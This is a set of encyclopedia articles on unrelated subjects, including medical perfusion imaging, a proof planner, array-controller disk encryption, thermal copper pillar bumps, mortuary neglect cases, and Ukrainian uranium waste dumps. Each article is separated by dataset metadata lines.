scan, is a way of identifying mismatched areas of blood and air supply to the lungs. It is primarily used to detect a pulmonary embolus. The perfusion part of the study uses a radioisotope tagged to the blood which shows where in the lungs the blood is perfusing. If the scan shows up any area missing a supply on the scans this means there is a blockage which is not allowing the blood to perfuse that part of the organ. Myocardial perfusion imaging Myocardial perfusion imaging (MPI) is a form of functional cardiac imaging, used for the diagnosis of ischemic heart disease. The underlying principle is that under conditions of stress, diseased myocardium receives less blood flow than normal myocardium. MPI is one of several types of cardiac stress test. A cardiac specific radiopharmaceutical is administered. E.g. 99mTc-tetrofosmin (Myoview, GE healthcare), 99mTc-sestamibi (Cardiolite, Bristol-Myers Squibb now Lantheus Medical Imaging). Following this, the heart rate is raised to induce myocardial stress, either by exercise or pharmacologically with adenosine, dobutamine or dipyridamole (aminophylline can be used to reverse the effects of dipyridamole). SPECT imaging performed after stress reveals the distribution of the radiopharmaceutical, and therefore the relative blood flow to the different regions of the myocardium. Diagnosis is made by comparing stress images to a further set of images obtained at rest. As the radionuclide redistributes slowly, it is not usually possible to perform both sets of images on the same day, hence a second attendance is required 1–7 days later (although, with a Tl-201 myocardial perfusion study with dipyridamole, rest images can be acquired as little as two-hours post stress). However, if stress imaging is normal, it is unnecessary to perform rest imaging, as it too will be normal – thus stress imaging is normally performed first. MPI has been demonstrated to have an overall accuracy of about 83% (sensitivity: 85%; specificity: 72%), and is comparable (or better) than other non-invasive tests for ischemic heart disease, including stress echocardiography. Functional brain imaging Usually the gamma-emitting tracer used in functional brain imaging is technetium (99mTc) exametazime (99mTc-HMPAO, hexamethylpropylene amine oxime). Technetium-99m (99mTc) is a metastable nuclear isomer which emits gamma rays which can be detected by a gamma camera. When it is attached to exametazime, this allows 99mTc to be taken up by brain tissue in a manner proportional to brain blood flow, in turn allowing brain blood flow to be assessed with the nuclear gamma camera. Because blood flow in the brain is tightly coupled to local brain metabolism and energy use, 99mTc-exametazime (as well as the similar 99mTc-EC tracer) is used to assess brain metabolism regionally, in an attempt to diagnose and differentiate the different causal pathologies of dementia. Meta analysis of many reported studies suggests that SPECT with this tracer is about 74% sensitive at diagnosing Alzheimer's disease, vs. 81% sensitivity for clinical exam (mental testing, etc.). More recent studies have shown accuracy of SPECT in Alzheimer diagnosis as high as 88%. In meta analysis, SPECT was superior to clinical exam and clinical criteria (91% vs. 70%) in being able to differentiate Alzheimer's disease from vascular dementias. This latter ability relates to SPECT's imaging of local metabolism of the brain, in which the patchy loss of cortical metabolism seen in multiple strokes differs clearly from the more even or "smooth" loss of non-occipital cortical brain function typical of Alzheimer's disease. 99mTc-exametazime SPECT scanning competes with fludeoxyglucose (FDG) PET scanning of the brain, which works to assess regional brain glucose metabolism, to provide very similar information about local brain damage from many processes. SPECT is more widely available, however, for the basic reason that the radioisotope generation technology is longer-lasting and far less expensive in SPECT, and the gamma scanning equipment is less expensive as well. The reason for this is that 99mTc is extracted from relatively simple technetium-99m generators which are delivered to hospitals and scanning centers weekly, to supply fresh radioisotope, whereas FDG PET relies on FDG which must be made in an expensive medical cyclotron and "hot-lab" (automated chemistry lab for radiopharmaceutical manufacture), then must be delivered directly to scanning sites, with delivery-fraction for each trip limited by its natural short 110 minute half-life. Testicular torsion detection Radionuclide scanning of the scrotum is the most accurate imaging technique to diagnose testicular torsion, but it is not routinely available. The agent of choice for this purpose is technetium-99m pertechnetate. Initially it provides a radionuclide angiogram, followed by a static image after the radionuclide has perfused the tissue. In the healthy patient, initial images show symmetric flow to the testes, and delayed images show uniformly symmetric activity. See also Functional magnetic resonance imaging Ischemia-reperfusion injury of the appendicular musculoskeletal system MUGA scan Perfusion Positron emission tomography Stroke Ventilation/perfusion ratio References Medical tests Medical physics Medical imaging
Perfusion scanning
[ "Physics" ]
2,341
[ "Applied and interdisciplinary physics", "Medical physics" ]
16,434,659
https://en.wikipedia.org/wiki/IsaPlanner
IsaPlanner is a proof planner for the interactive proof assistant, Isabelle. Originally developed by Lucas Dixon as part of his PhD thesis at the University of Edinburgh, it is now maintained by members of the Mathematical Reasoning Group, in the School of Informatics at Edinburgh. IsaPlanner is the latest of a series of proof planners written at Edinburgh. Earlier planners include Clam and LambdaClam. Features IsaPlanner allows the user to encode reasoning techniques, using a combinator language, for conjecturing and proving theorems. IsaPlanner works by manipulating reasoning states, records of open goals, the current proof plan and other important information, and combinators are functions mapping reasoning states to lazy lists of successor reasoning states. IsaPlanner's library supplies combinators for branching and iteration, amongst other tasks, and powerful reasoning techniques can be created by combining simpler reasoning techniques with these combinators. Several reasoning techniques come ready implemented within IsaPlanner, notably, IsaPlanner features an implementation of dynamic rippling, a rippling heuristic capable of working in higher order settings, a best-first rippling heuristic and a reasoning technique for proofs by induction. Additional features include an interactive tracing tool, for manually stepping through proof attempts and a module for viewing and manipulating hierarchical proofs. Planned features Features currently being implemented, or planned for the future, are an expanded set of proof critics, suitable for use in higher order domains, dynamic relational rippling, a rippling heuristic suitable for rippling over relational expressions as opposed to functional expressions, again suitable for use in higher order domains, and integration of IsaPlanner with Proof General. References External links IsaPlanner project page Mathematical Reasoning Group Automated theorem proving
IsaPlanner
[ "Mathematics" ]
363
[ "Mathematical logic", "Computational mathematics", "Automated theorem proving" ]
16,436,055
https://en.wikipedia.org/wiki/Array%20controller%20based%20encryption
Within a storage network, encryption of data may occur at different hardware levels. Array controller based encryption describes the encryption of data occurring at the disk array controller before being sent to the disk drives. This article will provide an overview of different implementation techniques to array controller based encryption. For cryptographic and encryption theory, see disk encryption theory. Possible points of encryption in SAN The encryption of data can take place in many points in a storage network. The point of encryption may occur on the host computer, in the SAN infrastructure, the array controller or on each of the hard disks as shown on the diagram above. Each point of encryption has different merits and costs. Within the diagram, the key server components are also shown for each configuration of encryption. Designers of SANs and SAN components must take into consideration factors such as performance, deployment complexity, key server interoperability, strength of security, and cost when choosing where to implement encryption. But since the array controller is a natural central point of all data therefore encryption at this level is inherent and also reduces deployment complexity. Array controller-based encryption With different configurations of a hardware or software array controller, there are different types of solutions for this type of encryption. Each of these solutions can be built into existing infrastructures by replacing or upgrading certain components. Basic components include an encryption key server, key management client, and commonly an encryption unit which are all implemented into a storage network. Internal array controller encryption For an internal array controller configuration, the array controller is generally a PCI bus card situated inside the host computer. As shown in the diagram, the PCI array controller would contain an encryption unit where plaintext data is encrypted into ciphertext. This separate encryption unit is utilized to prevent and minimize performance reduction and maintain data throughput. Furthermore, the Key Management Client will generally be an additional service within the host computer applications where it will authenticate all keys retrieved from the Key Server. A major disadvantage to this type of implementation would be that encryption components are required to be integrated within each host computer and therefore is redundant on large networks with many host devices. External array controller encryption In the case of an external array controller setup, the array controller would be an independent hardware module connected to the network. Within the hardware array controller would be an Encryption unit for data encryption as well as a Key Management Client for authentication. Generally, there are few hardware array controllers to many host devices and storage disks. Therefore, it reduces deployment complexity to implement into fewer hardware components. Moreover, the lifecycle of an array controller is generally much longer than host computers and storage disks, therefore the encryption implementation will not need to be reimplemented as often as if encryption was done at another point in the storage network. Encryption at the front-end or back-end side array controller In an external array controller, the encryption unit can either be placed either on the front-end side or the back-end side of the array controller. There are different advantages and disadvantages in placing the encryption unit either on the front-end side or the back-end side: The placement of the encryption unit may highly impact the secureness of your controller based encryption implementation. Therefore, this issue must be taken account for when designing your implementation to mitigate all security risks. Software array controller encryption For the software array controller encryption, a software array controller driver directs data into individual host bus adapters. In the adjacent diagram, there are multiple host bus adapters with hardware encryption units used for better performance requirements. In contrast, this type of encryption can be implemented with only 1 host bus adapter connected to a network of multiple hard drives and would still function. Performance will definitely be reduced since there will only be one encryption unit processing data. Key management will be done much like the internal array controller encryption mentioned before with the Key Management Client implemented as a service within the Host Computer. References External links PM8031 Encryption Enabled IC PM8032 Encryption Enabled IC Cryptography
Array controller based encryption
[ "Mathematics", "Engineering" ]
797
[ "Applied mathematics", "Cryptography", "Cybersecurity engineering" ]
16,436,236
https://en.wikipedia.org/wiki/HD%2075710
HD 75710 is a single star in the constellation of Vela. It has an apparent visual magnitude of approximately 4.94, which is bright enough to be faintly visible to the naked eye. Based upon an annual parallax shift of , it is located about 1,200 light-years from the Sun. The stellar classification of this star is A2 III, suggesting it is in the giant star stage of its stellar evolution. It has a high rate of spin with a projected rotational velocity of 110 km/s, which is giving the star an oblate shape with an equatorial bulge that is 7% larger than the polar radius. HD 75710 is radiating 914 times the Sun's luminosity from its photosphere at an effective temperature of . References A-type giants Vela (constellation) Velorum, g CD-44 04861 075710 043347 3520
HD 75710
[ "Astronomy" ]
186
[ "Vela (constellation)", "Constellations" ]
16,437,233
https://en.wikipedia.org/wiki/Hoesch%20reaction
The Hoesch reaction or Houben–Hoesch reaction is an organic reaction in which a nitrile reacts with an arene compound to form an aryl ketone. The reaction is a type of Friedel-Crafts acylation with hydrogen chloride and a Lewis acid catalyst. The synthesis of 2,4,6-Trihydroxyacetophenone (THAP) from phloroglucinol is representative: If two-equivalents are added, 2,4-Diacetylphloroglucinol is the product. An imine can be isolated as an intermediate reaction product. The attacking electrophile is possibly a species of the type R-C+=NHCl−. The arene must be electron-rich i.e. phenol or aniline type. A related reaction is the Gattermann reaction in which hydrocyanic acid not a nitrile is used. The reaction is named after Kurt Hoesch and Josef Houben who reported about this new reaction type in respectively 1915 and 1926. Mechanism The mechanism of the reaction involves two steps. The first step is a nucleophilic addition to the nitrile with the aid of a polarizing Lewis acid, forming an imine, which is later hydrolyzed during the aqueous workup to yield the final aryl ketone. See also Stephen aldehyde synthesis Gattermann reaction Hoesch reaction is demonstrated for Buflomedil. References Substitution reactions Name reactions
Hoesch reaction
[ "Chemistry" ]
315
[ "Coupling reactions", "Name reactions", "Organic reactions" ]
16,437,548
https://en.wikipedia.org/wiki/Zero%20mode
In physics, a zero mode is an eigenvector with a vanishing eigenvalue. In various subfields of physics zero modes appear whenever a physical system possesses a certain symmetry. For example, normal modes of multidimensional harmonic oscillator (e.g. a system of beads arranged around the circle, connected with springs) corresponds to elementary vibrational modes of the system. In such a system zero modes typically occur and are related with a rigid rotation around the circle. The kernel of an operator consists of left zero modes, and the cokernel consists of the right zero modes. References Linear algebra
Zero mode
[ "Mathematics" ]
128
[ "Linear algebra", "Algebra" ]
16,437,835
https://en.wikipedia.org/wiki/Thermal%20copper%20pillar%20bump
A thermal copper pillar bump, also known as a "thermal bump", is a thermoelectric device made from thin-film thermoelectric material embedded in flip chip interconnects (in particular copper pillar solder bumps) for use in electronics and optoelectronic packaging, including: flip chip packaging of CPU and GPU integrated circuits (chips), laser diodes, and semiconductor optical amplifiers (SOA). Unlike conventional solder bumps that provide an electrical path and a mechanical connection to the package, thermal bumps act as solid-state heat pumps and add thermal management functionality locally on the surface of a chip or to another electrical component. The diameter of a thermal bump is 238 μm and 60 μm high. Thermal bumps use the thermoelectric effect, which is the direct conversion of temperature differences to electric voltage and vice versa. Simply put, a thermoelectric device creates a voltage when there is a different temperature on each side, or when a voltage is applied to it, it creates a temperature difference. This effect can be used to generate electricity, to measure temperature, to cool objects, or to heat them. For each bump, thermoelectric cooling (TEC) occurs when a current is passed through the bump. The thermal bump pulls heat from one side of the device and transfers it to the other as current is passed through the material. This is known as the Peltier effect. The direction of heating and cooling is determined by the direction of current flow and the sign of the majority electrical carrier in the thermoelectric material. Thermoelectric power generation (TEG) on the other hand occurs when the thermal bump is subjected to a temperature gradient (i.e., the top is hotter than the bottom). In this instance, the device generates current, converting heat into electrical power. This is termed the Seebeck effect. The thermal bump was developed by Nextreme Thermal Solutions as a method for integrating active thermal management functionality at the chip level in the same manner that transistors, resistors and capacitors are integrated in conventional circuit designs today. Nextreme chose the copper pillar bump as an integration strategy due to its widespread acceptance by Intel, Amkor and other industry leaders as the method for connecting microprocessors and other advanced electronics devices to various surfaces during a process referred to as “flip-chip” packaging. The thermal bump can be integrated as a part of the standard flip-chip process (Figure 1) or integrated as discrete devices. The efficiency of a thermoelectric device is measured by the heat moved (or pumped) divided by the amount of electrical power supplied to move this heat. This ratio is termed the coefficient of performance or COP and is a measured characteristic of a thermoelectric device. The COP is inversely related to the temperature difference that the device produces. As you move a cooling device further away from the heat source, parasitic losses between the cooler and the heat source necessitate additional cooling power: the further the distance between source and cooler, the more cooling is required. For this reason, the cooling of electronic devices is most efficient when it occurs closest to the source of the heat generation. Use of the thermal bump does not displace system level cooling, which is still needed to move heat out of the system; rather it introduces a fundamentally new methodology for achieving temperature uniformity at the chip and board level. In this manner, overall thermal management of the system becomes more efficient. In addition, while conventional cooling solutions scale with the size of the system (bigger fans for bigger systems, etc.), the thermal bump can scale at the chip level by using more thermal bumps in the overall design. A brief history of solder and flip chip/chip scale packaging Solder bumping technology (the process of joining a chip to a substrate without shorting using solder) was first conceived and implemented by IBM in the early 1960s. Three versions of this type of solder joining were developed. The first was to embed copper balls in the solder bumps to provide a positive stand-off. The second solution, developed by Delco Electronics (General Motors) in the late 1960s, was similar to embedding copper balls except that the design employed a rigid silver bump. The bump provided a positive stand-off and was attached to the substrate by means of solder that was screen-printed onto the substrate. The third solution was to use a screened glass dam near the electrode tips to act as a ‘‘stop-off’’ to prevent the ball solder from flowing down the electrode. By then the Ball Limiting Metallurgy (BLM) with a high-lead (Pb) solder system and a copper ball had proven to work well. Therefore, the ball was simply removed and the solder evaporation process extended to form pure solder bumps that were approximately 125μm high. This system became known as the controlled collapse chip connection (C3 or C4). Until the mid-1990s, this type of flip-chip assembly was practiced almost exclusively by IBM and Delco. Around this time, Delco sought to commercialize its technology and formed Flip Chip Technologies with Kulicke & Soffa Industries as a partner. At the same time, MCNC (which had developed a plated version of IBM’s C4 process) received funding from DARPA to commercialize its technology. These two organizations, along with APTOS (Advanced Plating Technologies on Silicon), formed the nascent out-sourcing market. During this same time, companies began to look at reducing or streamlining their packaging, from the earlier multi-chip-on-ceramic packages that IBM had originally developed C4 to support, to what were referred to as Chip Scale Packages (CSP). There were a number of companies developing products in this area. These products could usually be put into one of two camps: either they were scaled down versions of the multi-chip on ceramic package (of which the Tessera package would be one example); or they were the streamlined versions developed by Unitive Electronics, et al. (where the package wiring had been transferred to the chip, and after bumping, they were ready to be placed). One of the issues with the CSP type of package (which was intended to be soldered directly to an FR4 or flex circuit) was that for high-density interconnects, the soft solder bump provided less of a stand-off as the solder bump diameter and pitch were decreased. Different solutions were employed including one developed by Focus Interconnect Technology (former APTOS engineers), which used a high aspect ratio plated copper post to provide a larger fixed standoff than was possible for a soft solder collapse joint. Today, flip chip is a well established technology and collapsed soft solder connections are used in the vast majority of assemblies. The copper post stand-off developed for the CSP market has found a home in high-density interconnects for advanced micro-processors and is used today by IBM for its CPU packaging. Copper pillar solder bumping Trends in high-density interconnects have led to the use of copper pillar solder bumps (CPB) for CPU and GPU packaging. CPBs are an attractive replacement for traditional solder bumps because they provide a fixed stand-off independent of pitch. This is extremely important as most of the high-end products are underfilled and a smaller standoff may create difficulties in getting the underfill adhesive to flow under the die. Figure 2 shows an example of a CPB fabricated by Intel and incorporated into their Presler line of microprocessors among others. The cross section shows copper and a copper pillar (approximately 60 um high) electrically connected through an opening (or via) in the chip passivation layer at the top of the picture. At the bottom is another copper trace on the package substrate with solder between the two copper layers. Thin-film thermoelectric technology Thin films are thin material layers ranging from fractions of a nanometer to several micrometers in thickness. Thin-film thermoelectric materials are grown by conventional semiconductor deposition methods and fabricated using conventional semiconductor micro-fabrication techniques. Thin-film thermoelectrics have been demonstrated to provide high heat pumping capacity that far exceeds the capacities provided by traditional bulk pellet TE products. The benefit of thin-films versus bulk materials for thermoelectric manufacturing is expressed in Equation 1. Here the Qmax (maximum heat pumped by a module) is shown to be inversely proportional to the thickness of the film, L.          Eq. 1 As such, TE coolers manufactured with thin-films can easily have 10x – 20x higher Qmax values for a given active area A. This makes thin-film TECs ideally suited for applications involving high heat-flux flows. In addition to the increased heat pumping capability, the use of thin films allows for truly novel implementation of TE devices. Instead of a bulk module that is 1–3 mm in thickness, a thin-film TEC can be fabricated less than 100 um in thickness. In its simplest form, the P or N leg of a TE couple (the basic building block of all thin-film TE devices) is a layer of thin-film TE material with a solder layer above and below, providing electrical and thermal functionality. Thermal copper pillar bump The thermal bump is compatible with the existing flip-chip manufacturing infrastructure, extending the use of conventional solder bumped interconnects to provide active, integrated cooling of a flip-chipped component using the widely accepted copper pillar bumping process. The result is higher performance and efficiency within the existing semiconductor manufacturing paradigm. The thermal bump also enables power generating capabilities within copper pillar bumps for energy recycling applications. Thermal bumps have been shown to achieve a temperature differential of 60 °C between the top and bottom headers; demonstrated power pumping capabilities exceeding 150 W/cm2; and when subjected to heat, have demonstrated the capability to generate up to 10 mW of power per bump. Thermal copper pillar bump structure Figure 3 shows an SEM cross-section of a TE leg. Here it is demonstrated that the thermal bump is structurally identical to a CPB with an extra layer, the TE layer, incorporated into the stack-up. The addition of the TE layer transforms a standard copper pillar bump into a thermal bump. This element, when properly configured electrically and thermally, provides active thermoelectric heat transfer from one side of the bump to the other side. The direction of heat transfer is dictated by the doping type of the thermoelectric material (either a P-type or N-type semiconductor) and the direction of electric current passing through the material. This type of thermoelectric heat transfer is known as the Peltier effect. Conversely, if heat is allowed to pass from one side of the thermoelectric material to the other, a current will be generated in the material in a phenomenon known as the Seebeck effect. The Seebeck effect is essentially the reverse of the Peltier effect. In this mode, electrical power is generated from the flow of heat in the TE element. The structure shown in Figure 3 is capable of operating in both the Peltier and Seebeck modes, though not simultaneously. Figure 4 shows a schematic of a typical CPB and a thermal bump for comparison. These structures are similar, with both having copper pillars and solder connections. The primary difference between the two is the introduction of either a P- or N-type thermoelectric layer between two solder layers. The solders used with CPBs and thermal bumps can be any one of a number of commonly used solders including, but not limited to, Sn, SnPb eutectic, SnAg or AuSn. Figure 5 shows a device equipped with a thermal bump. The thermal flow is shown by the arrows labeled “heat.” Metal traces, which can be several micrometres high, can be stacked or interdigitated to provide highly conductive pathways for collecting heat from the underlying circuit and funneling that heat to the thermal bump. The metal traces shown in the figure for conducting electric current into the thermal bump may or may not be directly connected to the circuitry of the chip. In the case where there are electrical connections to the chip circuitry, on-board temperature sensors and driver circuitry can be used to control the thermal bump in a closed loop fashion to maintain optimal performance. Second, the heat that is pumped by the thermal bump and the additional heat created by the thermal bump in the course of pumping that heat will need to be rejected into the substrate or board. Since the performance of the thermal bump can be improved by providing a good thermal path for the rejected heat, it is beneficial to provide high thermally conductive pathways on the backside of the thermal bump. The substrate could be a highly conductive ceramic substrate like AlN or a metal (e.g., Cu, CuW, CuMo, etc.) with a dielectric. In this case, the high thermal conductance of the substrate will act as a natural pathway for the rejected heat. The substrate might also be a multilayer substrate like a printed wiring board (PWB) designed to provide a high-density interconnect. In this case, the thermal conductivity of the PWB may be relatively poor, so adding thermal vias (e.g. metal plugs) can provide excellent pathways for the rejected heat. Applications Thermal bumps can be used in a number of different ways to provide chip cooling and power generation. General cooling Thermal bumps can be evenly distributed across the surface of a chip to provide a uniform cooling effect. In this case, the thermal bumps may be interspersed with standard bumps that are used for signal, power and ground. This allows the thermal bumps to be placed directly under the active circuitry of the chip for maximum effectiveness. The number and density of thermal bumps are based on the heat load from the chip. Each P/N couple can provide a specific heat pumping (Q) at a specific temperature differential (ΔT) at a given electric current. Temperature sensors on the chip (“on board” sensors) can provide direct measurement of the thermal bump performance and provide feedback to the driver circuit. Precision temperature control Since thermal bumps can either cool or heat the chip depending on the current direction, they can be used to provide precision control of temperature for chips that must operate within specific temperature ranges irrespective of ambient conditions. For example, this is a common problem for many optoelectronic components. Hotspot cooling In microprocessors, graphics processors, and other high-end chips, hotspots can occur as power densities vary significantly across a chip. These hotspots can severely limit the performance of the devices. Because of the small size of the thermal bumps and the relatively high density at which they can be placed on the active surface of the chip, these structures are ideally suited for cooling hotspots. In such a case, the distribution of the thermal bumps may not need to be even. Rather, the thermal bumps would be concentrated in the area of the hotspot while areas of lower heat density would have fewer thermal bumps per unit area. In this way, cooling from the thermal bumps is applied only where needed, thereby reducing the added power necessary to drive the cooling and reducing the general thermal overhead on the system. Power generation In addition to chip cooling, thermal bumps can also be applied to high heat-flux interconnects to provide a constant, steady source of power for energy scavenging applications. Such a source of power, typically in the mW range, can trickle charge batteries for wireless sensor networks and other battery operated systems. References External links Kulicke & Soffa MCNC Aptos Technology Nextreme Thermal Solutions Amkor Technology Inc. White Papers, Articles and Application Notes Electronics manufacturing Semiconductors Thermodynamics
Thermal copper pillar bump
[ "Physics", "Chemistry", "Materials_science", "Mathematics", "Engineering" ]
3,297
[ "Electrical resistance and conductance", "Physical quantities", "Semiconductors", "Materials", "Electronic engineering", "Condensed matter physics", "Thermodynamics", "Electronics manufacturing", "Solid state engineering", "Matter", "Dynamical systems" ]
16,438,268
https://en.wikipedia.org/wiki/Patient%20and%20mortuary%20neglect
Neglect is defined as giving little attention to or to leave undone or unattended to, especially through carelessness. Mortuary neglect can comprise many things, such as bodies being stolen from the morgue, or bodies being mixed up and the wrong one was buried. When a mortuary fails to preserve a body correctly, it could also be considered neglect because of the consequences. Patient neglect is similar to mortuary neglect with one major difference: that patient neglect has to do with people who are still living and that neglect could ultimately lead to their death. Patient neglect concerns people in hospitals, in nursing homes, or being cared for in home. Usually in nursing homes or home-assisted living, neglect would consist of patients being left lying in their own urine and/or feces, which could, in turn, possibly attract flesh flies and lead to maggot infestation. It also encompasses patients getting rashes, lice, and other sores from being improperly cared for. Types of mortuary neglect and the law The general sign of mortuary neglect (in terms of forensic entomology) is an infestation of maggots or some other insect (such as cockroaches) of a corpse. This should not be confused with insects found on a body before they are transferred to the morgue. The following examples are forms of mortuary neglect that pertain to the ethical treatment of a corpse. Improper embalming Improper embalming is the utilization of embalming techniques that cause premature decomposition of the body especially in cases where the body in question is to be presented in an open-casket funeral. In addition, not refrigerating the body immediately following death, but before the embalming process could lead to rapid deterioration of the human remains as well. Washington v. John T. Rhines Co. On August 29, 1994, widow Marian Washington filed suit against funeral home, John T. Rhines Co., for improperly embalming her late husband Vernon W. Washington. She claimed that the embalming fluid was leaking and that her husband's skin was decomposing at an alarming rate. John T. Rhines Co. re-embalmed Mr. Washington in efforts to make his body presentable. However, they failed to restore Mr. Washington's body completely. Cooley v. State Board of Funeral Directors and Embalmers On May 3, 1956, Cooley, a petitioner of a particular funeral home tried to appeal the revoke of his license by the California state board of funeral directors and embalmers. The case reveals the reasons as to why the license was revoked. Cooley's practices were described as unsanitary for the following reasons: an infant was discovered improperly embalmed after maggots were seeping out of its orifices, commingling of bodies, blood stains were found on the walls, and tools used were not cleaned from one autopsy to the next. Needless to say, the appeal was not granted. Fencing stolen organs This form of abuse consists of selling body parts stolen from carcasses that are sent to the morgue for embalming. Commingling of ashes Commingling of ashes is putting several bodies in the same crematorium during the same burn cycle. This act undermines the respect due a passed loved one. Unauthorized disposal In this form of abuse, funeral home operators dispose of the body in a manner not authorized by the deceased's loved ones. Christensen v. Superior Court of Los Angeles County On June 28, 1990, a court heard a case on a class action suit against multiple funeral service operators. These acts included all of the types of mortuary neglect mentioned above in this section. The case contended that the defendants violated conscionable standards regarding the treatment of the deceased. This practice occurred for nearly a decade and victimized approximately 17,000 decedents and their families. Unethical treatment of the deceased Any violation of the standards that any reasonable person would expect of a Mortuary operator could be considered in this category. Dennis v. Robbins Funeral Home James Dennis, widower of Molly Dennis, sued Robbins Funeral Home on August 24, 1987. Before Mrs. Dennis was to be cremated, Lee Miller, the funeral director of Robbins Funeral Home called the family to see the body. When the family arrived, to their dismay, they found Molly Dennis's body unprofessionally presented in an unhygienic environment as unspecified limbs were hanging off the dissection table and into a dirty sink. Mr. Dennis was not, however, able to successfully sue the funeral home because the judicial history in the area did not include a precedent for funeral home malpractice. National Funeral Directors Association The National Funeral Directors Association (NFDA) is an organization in the United States that regulates mortuaries and morgues and their activities regarding the embalming and interring of the deceased. With any complaint including mortuary neglect, the NFDA has a fifteen step disciplinary process it goes through to determine the severity of the situation. After receiving a complaint, a committee reviews the situation even to the extent of an investigation and then they determine the consequences of the violation. Those considered in violation of the NFDA's policies could face punitive action ranging from a warning to suspension from the organization. Trends There are certain segments of the health care industry that are seeing downward moves in neglect, while other sections are experiencing unfortunate growth. In modern hospitals the most prevalent form of neglect deals with the patients themselves neglecting their own care. However, in other segments such as assisted living for mentally deficient patients the rates of abuse and neglect are still relatively high. Mortuary neglect is another segment that has peculiar trends. There are relatively few morticians that just refuse to perform their duties. However, cases of ethically questionable practices can be easily found. Morticians only preserving visible body parts, incomplete embalming and defrauding families are just a few examples of reported cases of neglect. Increasingly medical journals are recommending that doctors become more active in attempting to persuade parents and guardians of children to either accept or continue treatment for diseases or injuries in order to avoid a neglect case. In the American Orthopedic Journal a case study was presented where a doctor suggested that an effort to convince a girl's mother to adequately treat a case of amblyopia to avoid potential neglect. While a viewpoint arguing this was unnecessary, it shows a growing trend to go beyond traditional measures to avoid neglect charges. History From the times of the ancient Egyptians, cases of mortuary neglect have been recorded. The process of embalming is to preserve the dead for burial, as the Egyptians believed the afterlife was just as important as life itself. However, if a woman was married to an embalmer, he would likely keep her preserved for his own benefit until obvious decomposition took place. Dignity for the dead is now a legal matter, as patient neglect has always been. Abuse in the healthcare system is another huge problem in today's society. Nursing homes and hospitals are preying grounds for predators of the weak and disabled. In 2001 a nursing home in Ossining, New York was closed because of neglect and unsafe conditions that existed for the patients. US state laws For the most part, mortuary standards are created by the states, not by the federal government. The following are links to state policies (where available) on mortuary practices: Arizona Arkansas California Colorado Connecticut Delaware Florida Hawaii Idaho Iowa Kansas Louisiana Maine Maryland Massachusetts Michigan Minnesota Mississippi Missouri Montana Nebraska New Hampshire New Jersey New Mexico Ohio Oklahoma Oregon Rhode Island South Dakota Tennessee Texas Vermont Virginia Washington Wyoming References External links Summary of Violations. Texas Funeral Service Commission. 18 March 2008 Abuse Legal aspects of death
Patient and mortuary neglect
[ "Biology" ]
1,582
[ "Abuse", "Behavior", "Aggression", "Human behavior" ]
16,438,537
https://en.wikipedia.org/wiki/Hooker%20reaction
In the Hooker reaction (1936) an alkyl chain in a certain naphthoquinone (phenomenon first observed in the compound lapachol) is reduced by one methylene unit as carbon dioxide in each potassium permanganate oxidation. Mechanistically oxidation causes ring-cleavage at the alkene group, extrusion of carbon dioxide in decarboxylation with subsequent ring-closure. References Organic reactions Name reactions Degradation reactions Homologation reactions
Hooker reaction
[ "Chemistry" ]
97
[ "Name reactions", "Degradation reactions", "Organic reactions" ]
16,440,097
https://en.wikipedia.org/wiki/Prydniprovsky%20Chemical%20Plant%20radioactive%20dumps
The now-defunct Prydniprovsky Chemical Plant (; Prydniprovsky khimichnyi zavod, PHZ, also PChP) in the city of Kamianske, Ukraine, processed uranium ore for the Soviet nuclear program from 1948 through 1991, preparing yellowcake. Its processing wastes are now stored in nine open-air dumping grounds containing about 36 million tonnes of sand-like low-radioactive residue, occupying an area of 2.5 million square meters. The sites, improperly constructed from the very beginning, have been abandoned by the industry long ago and remain in very poor condition. The top concern is the dumps’ proximity to both the large Dnieper River and city residential areas. According to government experts, the dams separating the grounds from soil water are already leaking, causing the pollution of Dnieper basin. It is believed that further deterioration of the dams, irrespective of any outer accidents, may cause a devastating radioactive mudslide. The Ukrainian government is now tightening control over the grounds and seeking international aid in projects aimed at securing and the gradual re-processing of the PHZ wastes. Recently, the International Atomic Energy Agency has evaluated the condition of the sites and is considering dispatching a major observation and aid mission to Kamianske. From 1946 to 1972, the company was engaged in uranium enrichment (production of its nitrous oxide) - the plant processed 65% of uranium ores in the Soviet Union. Attempts to recycle fuel elements began in 1974, but due to the growing number of oncological diseases in the city, this idea was abandoned. The isolated dump grounds (about nine altogether, at a depth of 3 m) of the former plant are now located in different parts of the city and operated by the purposely-created "Barrier" State Enterprise - with an obscure-meaning new name that has yet to be widely known. That is why the sites, the company, and the whole problem is still commonly referred to as the "Prydniprovsky Chemical Plant (PHZ) wastes". In 1964 the first treatment facilities appeared at the enterprise. In 2003, the Cabinet of Ministers approved an 11-year program on "bringing hazardous facilities of the Prydniprovsky Chemical Plant to an environmentally safe state and ensuring protection of the population from the harmful effects of ionizing radiation". See also Threat of the Dnieper reservoirs References Environment of Ukraine Nuclear technology in Ukraine Kamianske Radioactive waste Chemical engineering Dnieper basin Chemical companies of Ukraine Nuclear technology in the Soviet Union Chemical companies of the Soviet Union Government-owned companies of Ukraine
Prydniprovsky Chemical Plant radioactive dumps
[ "Physics", "Chemistry", "Technology", "Engineering" ]
535
[ "Nuclear physics", "Chemical engineering", "Nuclear chemistry stubs", "Nuclear and atomic physics stubs", "Environmental impact of nuclear power", "Radioactivity", "nan", "Hazardous waste", "Radioactive waste" ]
16,440,164
https://en.wikipedia.org/wiki/L%C3%BCroth%27s%20theorem
In mathematics, Lüroth's theorem asserts that every field that lies between a field K and the rational function field K(X) must be generated as an extension of K by a single element of K(X). This result is named after Jacob Lüroth, who proved it in 1876. Statement Let be a field and be an intermediate field between and , for some indeterminate X. Then there exists a rational function such that . In other words, every intermediate extension between and is a simple extension. Proofs The proof of Lüroth's theorem can be derived easily from the theory of rational curves, using the geometric genus. This method is non-elementary, but several short proofs using only the basics of field theory have long been known, mainly using the concept of transcendence degree. Many of these simple proofs use Gauss's lemma on primitive polynomials as a main step. References Algebraic varieties Birational geometry Field (mathematics) Theorems in algebraic geometry
Lüroth's theorem
[ "Mathematics" ]
205
[ "Theorems in algebraic geometry", "Theorems in geometry" ]
7,448,577
https://en.wikipedia.org/wiki/Coues%27s%20gadwall
